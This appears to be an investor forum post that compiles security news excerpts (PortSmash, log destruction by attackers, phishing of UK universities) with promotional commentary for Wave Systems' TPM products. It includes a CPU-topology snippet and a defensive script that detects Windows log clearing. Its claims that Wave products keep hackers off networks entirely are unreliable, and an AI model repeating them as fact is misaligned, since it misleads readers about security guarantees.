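    return {"smt": smt_active(cpus), "cores": core_siblings(cpus)}


# Constructed sample: one socket, two cores, each with two hardware threads,
# enumerated the way Intel parts usually are (0/2 and 1/3 are siblings).
SAMPLE_CPUINFO = "\n".join(
    f"processor\t: {p}\nmodel name\t: Constructed CPU @ 3.00GHz\n"
    f"physical id\t: 0\nsiblings\t: 4\ncore id\t: {p % 2}\ncpu cores\t: 2\n"
    for p in range(4)
)

if __name__ == "__main__":
    sample = parse_cpuinfo(SAMPLE_CPUINFO)
    print("SMT active:", smt_active(sample), core_siblings(sample))
```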
The PoC, Brumley says, works out of the box for Intel's Skylake and Kaby Lake, though it hasn't been tested on other Intel chips. He suggests it may work for other SMT architectures – such as AMD's Zen CPU family – if modifications are made to the code.
A CVE has been proposed, CVE-2018-5407; however, Intel doesn't appear to think it's worthy of a patch. For one thing, it has nothing to do with this year's speculative execution flaws: Spectre, Meltdown, and the like.
In a statement emailed to The Register, an Intel spokesperson suggested any risk can be mitigated through existing software protections, such as writing code that is resistant to SMT side-channel attacks. Chipzilla is, essentially, taking a line suggested in the mailing list discussion of the flaw that this isn't so much a vulnerability as "a fully expected by-design property" arising from SMT.
"Intel received notice of the research," the chipmaker's spokesperson said. "This issue is not reliant on speculative execution, and is therefore unrelated to Spectre, Meltdown or L1 Terminal Fault. We expect that it is not unique to Intel platforms. Research on side-channel analysis methods often focuses on manipulating and measuring the characteristics, such as timing, of shared hardware resources. Software or software libraries can be protected against such issues by employing side-channel safe development practices."
Intel's spokesperson repeated its assertion that the company takes protecting customer data seriously and considers it a top priority.
A spokesperson for AMD told us they're looking into it: "At AMD, security is a top priority and we are continually working to ensure the safety of our users as new risks arise. We are investigating the PortSmash side-channel vulnerability report, which we just received, to understand any potential AMD product susceptibility."
==================================================================
Intel CPUs impacted by new PortSmash side-channel vulnerability
https://www.zdnet.com/article/intel-cpus-impacted-by-new-portsmash-side-channel-vulnerability/
=================================================================
Why not store the cryptographic keys in the TPM and avoid a patching problem with Intel chips (and possibly AMD chips) altogether? The computer could then be protected by an enabled Bitlocker or an SED.
=================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpt:
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
Hackers are increasingly destroying logs to hide attacks
https://www.zdnet.com/article/hackers-are-increasingly-destroying-logs-to-hide-attacks/
According to a new report, 72 percent of incident response specialists have come across hacks where attackers have destroyed logs to hide their tracks.
Hacker groups are increasingly turning to log file destruction and other destructive methods as a means to hide their tracks, according to a report released this week and containing information from 113 investigations performed by 37 Carbon Black incident response (IR) affiliate partners from across the globe.
According to the report, "politically motivated cyberattacks from nation-state actors have contributed to an ominous increase in destructive attacks: attacks that are tailored to specific targets, cause system outages and destroy data in ways designed to paralyze an organization's operations."
Carbon Black said that hacker groups are getting better at what the company calls "counter-incident response."
They said that hackers attempted counter-incident response in 51 percent of all incidents the company and its partners investigated in the last 90 days.
"We've seen a lot of destruction of log data, very meticulous clean-up of antivirus logs, security logs, and denying IR teams the access to data they need to investigate," an IR professional said.
In fact, according to the Carbon Black report, 72 percent of all its partner IR professionals saw counter-IR operations in the form of destruction of logs, which appears to have become a standard tactic in the arsenal of most hackers.
But in some cases, hackers took log destruction and other counter-incident response operations to a new level, and in some cases their actions resulted in more lasting damage.
"Our respondents said victims experienced such attacks 32% of the time," Carbon Black said in its report.
"We've seen a lot of destructive actions from Iran and North Korea lately, where they've effectively wiped machines they suspect of being forensically analyzed," an IR professional said.
"Attackers want to cover their tracks because they're feeling the pressure from law enforcement," another IR professional said.
But Carbon Black also points out that the cyber-security industry, as a whole, has also gotten much better at incident response, hence attackers' increased focus on removing logs and even wiping systems, just to be on the safe side.
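Two signs of the counter-incident response described above that a defender can hunt for in forwarded telemetry, as an added example (not Carbon Black's code): explicit log-clearing events, and hosts that normally log steadily and then go silent. The event records below are constructed; the event IDs 1102 and 104 are the real Windows identifiers for a cleared log.

```python
"""Hunt for log destruction: explicit log-clear events plus hosts that fall
silent, which is what an attacker's "meticulous clean-up" looks like from
the SIEM side.

Added example, not Carbon Black's code. Events are plain dicts in the shape
a log forwarder might emit; all records here are constructed. Windows logs
event 1102 when the Security log is cleared and 104 when the System or
Application log is cleared, both from provider Microsoft-Windows-Eventlog.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LOG_CLEAR_IDS = {
    ("Microsoft-Windows-Eventlog", 1102): "Security log cleared",
    ("Microsoft-Windows-Eventlog", 104): "System/Application log cleared",
}


def find_log_clearing(events: list[dict]) -> list[tuple[str, str, str]]:
    """Return (host, time, description) for every explicit log-clear event."""
    hits = []
    for e in events:
        desc = LOG_CLEAR_IDS.get((e["provider"], e["event_id"]))
        if desc:
            hits.append((e["host"], e["time"], f"{desc} by {e.get('user', '?')}"))
    return hits


def find_silent_gaps(events: list[dict], max_gap: timedelta) -> list[tuple[str, str, str, float]]:
    """Per host, report stretches between consecutive events longer than max_gap.

    A host that logs every few minutes and then produces nothing for hours may
    have had its agent killed or its logs wiped, not merely gone idle.
    Returns (host, gap_start, gap_end, gap_hours).
    """
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(datetime.fromisoformat(e["time"]))
    gaps = []
    for host, times in by_host.items():
        times.sort()
        for earlier, later in zip(times, times[1:]):
            if later - earlier > max_gap:
                hours = (later - earlier).total_seconds() / 3600
                gaps.append((host, earlier.isoformat(), later.isoformat(), hours))
    return gaps


# Constructed sample: WS01 logs steadily, then its Security log is cleared and
# nothing arrives for about six hours; WS02 behaves normally.
SEC = "Microsoft-Windows-Security-Auditing"
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2018-11-02T09:00:00", "provider": SEC, "event_id": 4624, "user": "alice"},
    {"host": "WS01", "time": "2018-11-02T09:05:00", "provider": SEC, "event_id": 4688, "user": "alice"},
    {"host": "WS01", "time": "2018-11-02T09:07:30", "provider": "Microsoft-Windows-Eventlog",
     "event_id": 1102, "user": "alice"},
    {"host": "WS01", "time": "2018-11-02T15:10:00", "provider": SEC, "event_id": 4624, "user": "alice"},
    {"host": "WS02", "time": "2018-11-02T09:00:00", "provider": SEC, "event_id": 4624, "user": "bob"},
    {"host": "WS02", "time": "2018-11-02T09:30:00", "provider": SEC, "event_id": 4688, "user": "bob"},
]


def triage(events: list[dict] = SAMPLE_EVENTS, max_gap: timedelta = timedelta(hours=1)) -> dict:
    """Run both detections and return their findings together."""
    return {"cleared": find_log_clearing(events), "silent": find_silent_gaps(events, max_gap)}


if __name__ == "__main__":
    for kind, findings in triage().items():
        for f in findings:
            print(kind, *f)
```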
Other key findings:
The same Carbon Black report also touches on many other interesting topics, such as the use of legitimate tools for lateral movements inside compromised networks, the concept of "island hopping," and the increased focus on IoT devices as entry points into homes and companies. The summarized key findings are available below:
• China and Russia are responsible for nearly half of all cyberattacks. Of 113 investigations conducted by Carbon Black IR partners in the third quarter, 47 stemmed from those two countries alone, while Iran, North Korea, and Brazil were also the origin of a considerable amount of recent attacks.
• Half of today's attacks leverage "island hopping," whereby attackers target organizations with the intention of accessing an affiliate's network.
• An alarming 38 percent of IR professionals saw attacks on enterprise IoT devices, which can be a point of entry to organizations' primary networks, allowing island hopping.
• Around 54 percent of IR firms said they saw attacks on IoT consumer devices.
• Around 30 percent of respondents also saw victims' websites converted into a watering hole.
• An alarming 41 percent of respondents encountered instances where network-based protections were circumvented.
• PowerShell was the primary tool used for lateral movements inside a network by attackers, found in 89 percent of incidents, followed by WMI (Windows Management Instrumentation).
• Around 27 percent of respondents said a shortage of skilled security experts was the top barrier to incident response.
• The industry most frequently targeted by cyberattacks was the financial sector, followed by healthcare, retail, and manufacturing.
• Two-thirds of IR professionals believe cyberattacks will influence the upcoming US elections.
=================================================================
Incident response specialists wouldn't have to investigate/worry about logs (removed by the hacker) if their companies were using Wave ERAS and/or Wave VSC 2.0 since the hacker wouldn't be allowed on the network in the first place! This could save companies a lot of unproductivity and damage to their computer infrastructure as well as their reputation. Lateral movements inside the network could be prevented by Wave VSC 2.0 and the TPM!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
US senator working on bill that would jail CEOs for user privacy violations
https://www.zdnet.com/article/us-senator-working-on-bill-that-would-jail-ceos-for-user-privacy-violations/
Company execs could face up to 20 years in prison if they lie in privacy reports submitted to the FTC.
Oregon Democrat Senator Ron Wyden is working on a bill that would bolster US consumer privacy rights, bring them to the level of the EU General Data Protection Regulation (GDPR), and even take protections one step further by jailing executives at big companies for lying or not reporting privacy violations.
The new bill --named the Consumer Data Protection Act (CDPA)-- is only a draft for the time being, but Sen. Wyden has published a working version, asking for the public's feedback.
In its current state, the CDPA would grant the Federal Trade Commission new powers when enforcing consumer privacy rights.
For starters, the bill would establish minimum privacy and cybersecurity standards that companies would be forced to abide by or face the FTC's wrath. If companies fail, they risk GDPR-like fines of up to 4 percent of their total annual gross revenue.
Second, the CDPA would also mandate that large companies submit annual privacy reports with the FTC. Any company that manages the private data of more than 50 million users or has annual revenue of over $1 billion would have to do so, according to the CDPA.
Senior executives at these large companies, such as Chief Executive Officers, Chief Privacy Officers, or Chief Information Security Officers would personally vouch for these reports.
The reports would have to detail if and how the company complied with the CDPA's new privacy rules. If execs lie or fail to disclose privacy breaches in these reports, they could face up to 20 years in prison.
Among the new privacy protections mentioned in the current form of the CDPA, Sen. Wyden proposes that the FTC establish and enforce a "Do Not Track" system through which consumers are given a choice not to share their personal information with companies.
The CDPA also bans companies from blocking users from accessing their services if they decided not to share their personal data. Instead, the bill would allow companies to charge a user to access their sites or services with the equivalent of the user's data as an entrance fee.
Furthermore, taking a page out of GDPR's book, the CDPA would also allow users a way to review what personal information a company has collected about them and learn with whom it has been shared.
Last but not least, the bill would also create over 175 new jobs at the FTC for employees tasked with watching out for US consumers' privacy, but the bill would also require the FTC to create an API that developers can use to build apps, which, in turn, would help consumers "request, receive, and process information they are entitled to under this Act, and to manage their opt-out preferences."
=================================================================
Given the choice of using RSA SecurID, other 2FA products or Wave VSC 2.0, CEOs may want to go with the better security (Wave VSC 2.0) or they may be spending time in prison in the future. imo.
=================================================================
Wave VSC 2.0 White Paper is at the link below and shows some weaknesses of RSA SecurID and others:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Cyber-threats are everywhere, but with Wave Virtual Smart Card 2.0 (Wave VSC 2.0) enterprises have a hardware-based, tokenless, two-factor authentication security solution with the security of a hardware token solution and the convenience and cost savings of a software token solution.
Wave VSC 2.0 delivers strong two-factor authentication using the Trusted Platform Module (TPM), the embedded security chip built into enterprise PCs. Wave empowers IT with management of the TPM and VSC 2.0. Companies successfully use Wave VSC 2.0 to secure VPN access, web applications and other certificate-based applications, like Wi-Fi with 802.1x, remote desktop, or Windows-user login. Use the security that’s already been deployed and save money with Wave VSC 2.0.
Every month we see headlines highlighting mammoth breaches (i.e. EBay, JP Morgan Chase, Sony, Target, etc…). In each case, millions of records were stolen, corporate images were tarnished, and enormous costs were incurred as a result. And equally disturbing, more often than not the attacks go undetected and as a result important information is stolen.
=================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
=================================================================
Global Professional Services Firm Renews Software Maintenance Agreement with Wave Systems
https://www.wavesys.com/buzz/pr/global-professional-services-firm-renews-software-maintenance-agreement-wave-systems
Lee, MA -
June 23, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announced that a global professional services firm has signed a one-year software maintenance renewal agreement for approximately $150,000 to use Wave’s TPM management software capabilities to secure their endpoint devices.
The customer utilizes Wave’s solution in conjunction with industry-standard Trusted Platform Module (TPM) security chips to deliver hardware-based secure authentication for over 100,000 employees worldwide.
“Wave provides a superior solution to secure access to critical corporate infrastructure. Our software allows an easy way to manage and access TPM cryptographic services best suited to the needs of clients with a diverse and distributed user population,” said Bill Solms, President and CEO, Wave Systems. “This agreement is an extension of their current contract with Wave. Their renewal and successful use of our software over the past several years validates that major global corporations continue to choose Wave’s solutions to protect their IT environments.”
=================================================================
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=144562943
=================================================================
The TPM has already been tested in real-world conditions with this professional services company (PWC, a UK-based company) with over 100,000 seats. It appears from this PR that the company has been well protected with Wave's product and the TPM. With Wave Knowd (currently in retirement) and Wave VSC 2.0, many British companies could be better protected with Wave's authentication product(s). The difference is that the time to turn on the TPM is shorter using ERAS than the time PWC spent turning them on years ago. Given the success PWC has had with TPMs and Wave's product, it seems that many companies in the UK, if told about this PR, would want to use a product like Wave's VSC 2.0.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Iranian Hackers Hit U.K. Cybersecurity Universities
https://www.forbes.com/sites/geoffwhite/2018/10/29/iranian-hackers-hit-u-k-cybersecurity-universities/#6e545fe331c9
Iranian cybercriminals tried to hack into U.K. universities offering government-certified cybersecurity courses, successfully accessing at least one university’s accounts during a campaign lasting months.
The hacking group has targeted at least 18 British universities, according to researchers. The list includes top-flight institutions. But it also includes less well-known destinations which are notable for being among a select group certified by the National Cyber Security Centre (NCSC) to provide degrees in cybersecurity.
It is not known whether the universities were singled out because of their affiliation, but half of those targeted by the hackers are on the NCSC-certified list, including Warwick and Lancaster. The attacks are believed to be linked to a previous campaign which US officials blamed on Iranians, in which dozens of universities were hacked and their research published on two Iranian websites.
People with U.K. university log-ins were sent phishing emails to trick them into giving up their passwords.
Lancaster University said a small number of recipients fell for the hackers’ attack and entered their credentials. The University reset their passwords and investigated whether any information had been lost.
“We were aware of the phishing campaign, which posed as a library notification and directed the user to the fake page,” a spokeswoman said. “The University blocked the link and all those targeted by the campaign were individually notified by the University.”
A Warwick University spokesman said its use of two-factor authentication would have prevented data theft. “There is no evidence of any data loss around sensitive or valuable research material at Warwick by [cyberattacks],” said a spokesman.
Students who take the certified cybersecurity degrees are not guaranteed a job with GCHQ or the National Cyber Security Centre, but will likely end up occupying senior positions protecting the UK’s largest companies and institutions from cyberattack.
The hackers sent their targets a fake email to trick them into logging in, thereby revealing their passwords. To make the emails look genuine the hackers created spoofed websites similar to the genuine universities’ sites.
The registration of the websites shows the hackers have been active in the last few months. A fake site for Warwick University, where cybersecurity masters courses are NCSC-certified, was set up in June. A fake Lancaster University site was created in May.
This is despite the US Department of Justice charging nine Iranians with hacks on universities in March, claiming the “Mabna Institute” group had stolen 31 terabytes of academic information from universities in 22 countries. Since then, researchers have been painstakingly tracking the creation of new fake websites, seemingly by the same hacking group, which show the hacking attempts on universities have continued.
A spokesperson for the NCSC said: “Universities are a popular target for cyber actors seeking access to intellectual property, such as cutting-edge research. The NCSC supports the academic sector to help them to improve their security practices. This has included our Active Cyber Defence programme, which took down 23 attempts to spoof one university’s website. We urge universities to follow the best practice cybersecurity advice on the NCSC website.”
The hackers also used the internet’s “green padlock” system to try to fool victims into entering their passwords. Many web users believe the presence of a green padlock in their browser means the site is safe to visit. In fact, it means only that information sent to and from the site is encrypted; the site itself could be fake or malicious.
The hackers successfully gained green padlock certificates from a US company called Let’s Encrypt, meaning victims could have been tricked into thinking the sites were legitimate. Let’s Encrypt told Forbes: “Browsers are misleading people about site safety when they display lock icons. Some people incorrectly interpret lock icons as a sign that a site's content is safe or trustworthy, and that's a completely separate issue from whether or not the connection is secure. We would like to see browsers stop displaying lock icons on the basis of the existence of a secure connection.”
=================================================================
I have read that the UK was testing the TPM many months ago, and with a 'Public' Wave Knowd the non-employees could have access to an authentication product that could protect them from hackers like the Iranians. (Knowd is in retirement currently but was a very promising product.) The UK 'Public' employees could have their authentication protected by Wave VSC 2.0. Wave has state-of-the-art technology around authentication that could benefit employees/non-employees (students) with these two products, which are easier to use than standard 2FA and are better security! There would be no need to fumble around with keys. And each product takes advantage of a standard (TPM) backed by 150 companies!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Key Features:
Strong Security
• Authenticate securely, encrypt email, and prove integrity of the device with one management console
• Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
• Provide centralized enforcement of custom policies
=================================================================
Wave Knowd Introduces New Model for Internet Authentication Without Passwords
Knowd ‘Trust Score’ Assures User Identity when Accessing Web Services
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Lee, MA -
May 9, 2013 -
Wave Systems Corp. (NASDAQ: WAVX), the Trusted Computing Company, today announced Wave Knowd, a new web service available for preview that significantly reduces the vulnerability and use of passwords by leveraging the unique identity of computing devices. With a simple integration of Wave Knowd, any website can establish reliable and consistent identity relationships with the devices its customers use most often for Internet services. Wave Knowd, which signifies “Known Devices,” is being tested by partners to provide the backbone for general purpose machine identity.
“The maturation of the web mandates a change in how we, and our computing devices, connect to the web,” said Steven Sprague, Wave CEO. “With cable television, satellite radio, bank kiosks and mobile phones, the service relationship is tied to the endpoint device. The web needs the security and simplicity of this same model, where our computing devices themselves play an added role in authentication. I access dozens of web services every day from the computer in my home office, and want those sites to know and trust my PC so they’ll stop continually asking me to log in. Wave Knowd enables that trust.”
To make web authentication stronger and simpler, Wave Knowd provides a new approach to signing on and accessing Cloud and Internet services. From online banking to business services and even consumer gaming, passwords are failing to provide a level of security that either service providers or users can trust. Knowd is built upon the concept that only known devices should ever access a protected network. Knowd incorporates all of your access and identity solutions together to establish a relationship of trust between users’ computing devices, and the web services they access.
“We interact online using so many devices now, but from a security perspective those devices aren’t all equal. Accessing medical records or confidential business files from my kid’s smartphone is certainly not as trustworthy as connecting from my business PC with an encrypted drive,” continued Mr. Sprague. “Wave Knowd is all about making the Web simpler and safer, and that new foundation of trust begins with known devices, and known capabilities.”
Once machine identity is established, any web site—from gaming, social networking or shopping; to banking, business and financial services—can use Wave Knowd to create a reliable and persistent identity for the connecting device. Knowd allows Web sites to streamline access for users who repeatedly log on from trusted devices, while bolstering security. Initial authentication creates a unique and anonymous relationship between each computing device and each web service accessed, and then the level of trust between the two grows over time. Knowing the device can also help the site prevent fraud and phishing, or simply provide quicker no-password access. Wave is the partner helping to create and manage these relationships.
“Wave Systems was the obvious choice to provide ID Dataweb’s attribute exchange with device identity services,” said David Coxe, CEO at ID Dataweb. “In Knowd, Wave has provided a system that is rooted in state of the art device security technologies such as the Trusted Platform Module and other secure elements, while also offering a simple web based integration. It’s easy to identify if a connecting device is highly trusted, or whether it requires added screening and security.”
ID Dataweb uses Wave’s Knowd solution as part of the Identity Ecosystem supported through a grant from the U.S. Department of Commerce’s National Institute of Standards and Technology’s NSTIC initiative (National Strategy for Trusted Identities in Cyberspace). ID Dataweb has created a standards-based platform to simplify online identity verification using OpenID credentials.
Providing the Tools to Manage Trust in the Cloud: What’s Your Trust Score?
Wave Knowd is a powerful enhancement for any website. The endpoint identity service links an individual user’s unique device identity with the Internet services that are typically protected only by username and password access. Users are prompted by their cloud service provider to register their primary computing devices to create a unique and persistent device identity relationship with their Internet services and service providers. No personal ID information is obtained by Wave, as Knowd works purely as a machine identity service. Furthermore, registered devices are given a unique ID for every service provider, establishing a separate trust relationship with each service.
Wave Knowd asserts a Trust Score that helps both consumers and cloud services or relying parties to determine the level of trust granted to each specific computing device. For example, a home PC that is used regularly for banking will quickly build a high Trust Score. Users can achieve a higher Trust Score by installing a small software application (Wave Knowd currently supports Windows 7 and 8, with Apple and Android to follow later this year). Business-class PCs containing a standard Trusted Platform Module (TPM) can establish even greater trust by leveraging the TPM security chip to create and securely store a unique device ID.
Knowd provides a web service with a new capability to enable or disable features based on the device that the user is actively using, providing a new security option for the end user. Perhaps an account password can only be reset from the user’s registered home computer and not from anywhere in the world, thereby linking in all of the user’s investment in the security of their home, from their alarm system to the doorman. Every web service can benefit from integrating Wave Knowd as part of the user’s experience.
Office envy: 56 percent of companies around the globe now embrace remote work
https://www.zdnet.com/article/office-envy-56-percent-of-companies-around-the-globe-now-embrace-remote-work/
New report puts data behind the growing trend toward remote work around the world.
A newly released report offers a snapshot of the spread of remote work arrangements globally. Survey data collected by the authors of the 2018 Global State of Remote Work report show that 56 percent of companies internationally support remote work in some capacity.
The report also found that more than half of respondents (52 percent) spent at least one day per week outside the office.
Updated annually, the report is sponsored by Owl Labs, a video conferencing hardware company. The survey this year included 3,028 employees across six continents and comprising 23 countries.
The number one reason respondents reported choosing remote work arrangements was productivity and focus. Country by country, the reasons were more varied. In North America, workers are more likely to work remotely to avoid a commute. In Africa, money savings was the primary motivator.
There are some other compelling tidbits in the report, as well. South America is embracing its fully remote workers, it turns out, but Asia is not. Globally, 44 percent of companies do not allow remote work in any capacity, while 16 percent are fully remote.
Male respondents surveyed reported being 8 percent more likely to work remotely than women.
The rise of remote work globally has spawned a booming industry of hardware and app-based solutions designed to bridge distance and lower barriers to working remotely. While it's tough to peg the size of that sector, anecdotal indicators suggest it's massive.
Slack, the unicorn of remote work tech, now has a valuation of $7 billion, and enterprise video conferencing could be a $10.5 billion market by 2026.
==================================================================
It sounds like the market for VSC 2.0 could be expanding Worldwide. With all the partners that Wave has it seems like their better security could be a hit with many companies Worldwide that use a VPN for remote work.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases
  ◦ Virtual Private Network (VPN)
  ◦ Local logon
  ◦ Remote logon
  ◦ Remote desktop access
  ◦ Intranet/Extranet
  ◦ Cloud applications
Amazon Web Services Customers Can Hack AWS Cloud And Steal Data, Says Oracle CTO Larry Ellison
https://www.forbes.com/sites/bobevans1/2018/10/26/amazon-web-services-customers-can-hack-aws-cloud-and-steal-data-says-oracle-cto-larry-ellison/#a52553376cfb
Excerpt: "One customer can see the other customer's data, Amazon can see your data, and the customer can change the Amazon code and hack the system," Oracle CTO Larry Ellison said last week.
==================================================================
An Amazon AWS customer could protect him/herself by using Scrambls and a great two factor authentication product like Wave VSC 2.0. imo.
==================================================================
Protect Content in the Cloud with Scrambls for Files
Scrambls Brings Privacy & Control to Social File Sharing with Instant Encryption
https://www.wavesys.com/buzz/pr/protect-content-cloud-scrambls-files
Palo Alto, CA -
November 13, 2012 -
Today scrambls announced Scrambls for Files as the next enhancement to the free service designed to allow you to control your social media, manage your online privacy, and decide who to share with. Scrambls for Files brings the power of scrambls into Microsoft Windows, for easy encryption of all types of files and folders before they are sent over the open Web.
Cloud storage and social media services have become increasingly prevalent in the market, with consumers quick to embrace the benefits. Yet there are vulnerabilities in the current model of uploading information into the cloud, and then trusting third parties to apply the proper privacy, security and authentication policies. Scrambls for Files brings a more secure method of data transfer for sharing files and folders anywhere you happen to be on the Web. With scrambls, users even maintain control to change who can read messages and files even after the fact.
“This is an important solution to consider for anyone that wants to safely and securely use cloud storage services like Dropbox™ or Microsoft SkyDrive™. Only members of your specified scrambls groups are aware of and can access the content, and you maintain the dynamic control to change those permissions anytime,” said Michael Sprague, scrambls co-creator. “Cloud storage and social media services see only the encrypted data, and we don’t even see it here at scrambls—we only manage the keys and groups as a trusted third party.”
The power lies in the dynamic groups offered by scrambls. Users choose exactly who can see and read anything scrambled, by forming groups (based upon email address, Facebook contacts/groups, etc.). With the same simplicity of scrambls text messages, users just choose what individuals or groups are permitted to read a file. Scrambls will decrypt and display both text and files. Retract messages and/or files by changing the groups or individuals authorized; schedule a specific time for messages and files to appear or expire; and much more.
“Scrambls can be used to encrypt your posts and files for enterprise-caliber protection wherever they travel across the networked social web,” continued Sprague. “Secure what you place in cloud storage and take control over who can read sensitive information. The keys to unlock your encrypted data remain separate from the content, only to be brought back together when the people you authorize look to pull that message down from the cloud. Everyone else will only see scrambled text.”
While encryption concepts are not new, they’ve traditionally been a burden to use. The simplicity and power of scrambls’ groups mechanism sets it apart. Sharing scrambled files does not require circulation of a password or management of enterprise encryption key servers. Users simply choose who is authorized to read anything and those people or groups are granted rights—all they need is a scrambls account of their own.
Scrambls is a platform that can be used with any service, to add the protection of scrambls into any web service and infrastructure you already know and use (Facebook, DropBox, email, Active Directory, etc.). The new model of information sharing supports file and folder encryption for all Microsoft Windows platforms.
Introducing Scrambls Professional for Power Users:
Scrambls continues to introduce more functionality, expanding what users can do with their groups & connections. Scrambls for Files is the latest of these innovations, following the recent Facebook Integration for login and group creation and several mobile apps.
With Scrambls for Files, a premium offering of scrambls will be introduced for heavier usage that brings added benefits to scrambls’ most active users. Scrambls is committed to keeping basic use free for any consumer to secure their social communications over the open Web. The professional version allows unlimited use of Scrambls for Files, along with more features and functionality that are yet to come.
Wavexpress.
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=28876167
The link above is one of barge's many great posts.
Wavexpress had the capability to monetize and multicast videos securely and that seems like a valuable combination to a cable company or to a YouTube.
With storage so much cheaper per gigabyte and larger capacities more available over the years, why not save your favorite video on an SSD or HDD for later viewing?! Ten years have gone by since Barge's post and there are many millions more TPMs in the market to help make microtransactions securely possible. People like having libraries of movies and Wavexpress could have the protection to offer newer movies sooner. imo. It's too bad Steven and Michael Sprague work for Rivetz given what they know about Wavexpress. I'm sure there are other ex-employees who know a lot about Wavexpress too! It was shut down many years ago, but 10 years later many millions more TPMs could help to breathe life into it once again!
One-Fifth of US Consumers Never Return to Breached Brands
https://www.infosecurity-magazine.com/news/fifth-consumers-never-return/?utm_source=dlvr.it&utm_medium=twitter
Over a fifth (21%) of US consumers will never return to a brand that has suffered a data breach, according to new research providing a timely reminder of the need for effective cybersecurity.
Contact center payments firm PCI Pal polled 2000 US consumers to produce a State of Security report which highlights the importance of trust and privacy to the average American.
As well as those who will never return to a business post-breach, a sizeable majority (83%) claimed they would stop spending for several months after a breach or serious incident.
In addition, 45% said they spend less with brands they perceive to have insecure data practices, and over a quarter (26%) will not give a company their business if they don’t trust it with their data.
Consumers are concerned not just about online security. Over a quarter (28%) questioned how their data is recorded over the phone and over two-fifths (42%) said they’re uncomfortable sharing sensitive data like credit card details over the phone.
The findings chime somewhat with RSA Security research from earlier this year which revealed that 69% of global consumers are prepared to boycott any company they believe does not take data protection seriously.
It also found the vast majority (62%) blame the company first in the event of a data breach, rather than the hacker.
The findings should be another reminder to organizations of the importance of a strong cybersecurity posture.
PCI Pal COO, James Barham, argued the findings reveal a change in how US consumers are prioritizing security and privacy.
“Consumer-facing brands should pay attention — not just adopting stronger security practices but incorporating them into their marketing and communications strategies if they want to keep customers loyal and spending with them,” he added.
It’s a change in consumer behavior being driven to a certain extent globally by the advent of the GDPR. Although it’s an EU law, it applies to any company processing EU citizens’ data, so the advent of the first major fine for a US company will be a significant moment in awareness raising.
Just this week, Apple CEO Tim Cook argued for a GDPR-style federal data privacy law.
==================================================================
This is another selling point for Wave VSC 2.0! Wave VSC 2.0 helps prevent breaches and could prevent the loss of customers.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
Cyber-threats are everywhere, but with Wave Virtual Smart Card 2.0 (Wave VSC 2.0) enterprises have a hardware-based, tokenless, two-factor authentication security solution with the security of a hardware token solution and the convenience and cost savings of a software token solution.
Wave VSC 2.0 delivers strong two-factor authentication using the Trusted Platform Module (TPM), the embedded security chip built into enterprise PCs. Wave empowers IT with management of the TPM and VSC 2.0. Companies successfully use Wave VSC 2.0 to secure VPN access, web applications and other certificate-based applications, like Wi-Fi with 802.1x, remote desktop, or Windows-user login. Use the security that’s already been deployed and save money with Wave VSC 2.0.
Every month we see headlines highlighting mammoth breaches (i.e. EBay, JP Morgan Chase, Sony, Target, etc…). In each case, millions of records were stolen, corporate images were tarnished, and enormous costs were incurred as a result. And equally disturbing, more often than not the attacks go undetected and as a result important information is stolen.
INTERTRUST, WAVE SYSTEMS TO INTEGRATE INTERTRUST DRM INTO WAVE CONTENT DISTRIBUTION SERVICES AND EMBASSY HARDWARE
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=31563151
A post from a favorite poster, Countryboy.
